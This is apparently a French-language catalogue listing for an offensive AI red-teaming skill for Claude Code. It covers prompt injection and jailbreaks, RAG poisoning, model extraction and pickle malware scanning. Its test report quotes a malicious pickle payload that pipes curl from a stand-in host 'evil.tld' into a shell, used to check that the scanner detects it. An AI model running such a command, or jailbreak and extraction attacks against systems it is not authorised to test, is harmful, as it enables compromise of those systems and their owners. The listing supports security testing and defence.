AI Security

Tests offensifs des systèmes LLM/ML : injection de prompt, empoisonnement RAG, scan de modèles pickle

par hypnguyen1209 · hypnguyen1209/offensive-claude

Testé · Fonctionne ★ 9.2/10

AI Security — Tests offensifs des systèmes LLM/ML : injection de prompt, empoisonnement RAG, scan de modèles pickle

Ce que fait

Une compétence de sécurité offensive pour le red-teaming des systèmes AI/ML : batteries d'injection de prompt et de jailbreak multi-tours, empoisonnement RAG/vector-DB, audits d'empoisonnement d'outils MCP/agent, scan de logiciels malveillants de modèles pickle pré-chargés, et sondes d'extraction de modèle/inférence d'appartenance en boîte noire, avec des mappings OWASP LLM Top-10 et MITRE ATLAS. Se déclenche lorsqu'un utilisateur demande d'attaquer, de red-team, ou d'auditer un LLM, un chatbot, un pipeline RAG, un serveur MCP, ou un artefact de modèle téléchargé. Livré avec cinq scripts Python exécutables plus cinq approfondissements de référence liés à des CVE spécifiques de 2024-2025.

Rapport de test

skills/ai-security/SKILL.md récupéré et 3 fichiers groupés vérifiés (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — tous HTTP 200. Pour la SORTIE, j'ai exécuté scripts/model_scan.py de la compétence, utilisant uniquement la stdlib, contre des pickles que j'ai créés : un malveillant avec __reduce__ -> os.system("curl http://evil.tld/x | sh"), un bénin, et un bénin dont les données contenaient simplement les chaînes "operating_system"/"subprocess". La base (byte-grep naïf) a signalé le fichier malveillant mais a également produit un FAUX-POSITIF pour le fichier de liste d'étiquettes bénin. La compétence a désassemblé les opcodes pickle via pickletools, a résolu posix.system via la REDUCE-reachability comme un appelable sur liste noire (JSONL structuré : gravité élevée, CWE-502, AML.T0011, code de sortie 2 comme porte CI), et a correctement nettoyé les deux fichiers bénins. Installation vérifiée dans un HOME mktemp propre plaçant SKILL.md à ~/.claude/skills/ai-security/SKILL.md.

Testé le: 2026-07-31 · Claude Code 2.x (agent harness)

Installation

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Commandes et exemples de prompts

  • /ai-securityTests offensifs des systèmes LLM/ML : injection de prompt, empoisonnement RAG, scan de modèles pickle

Les skills se déclenchent sur des demandes en langage courant — aucune commande à retenir. Après installation, des prompts comme ceux-ci l'activent (en anglais) :

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API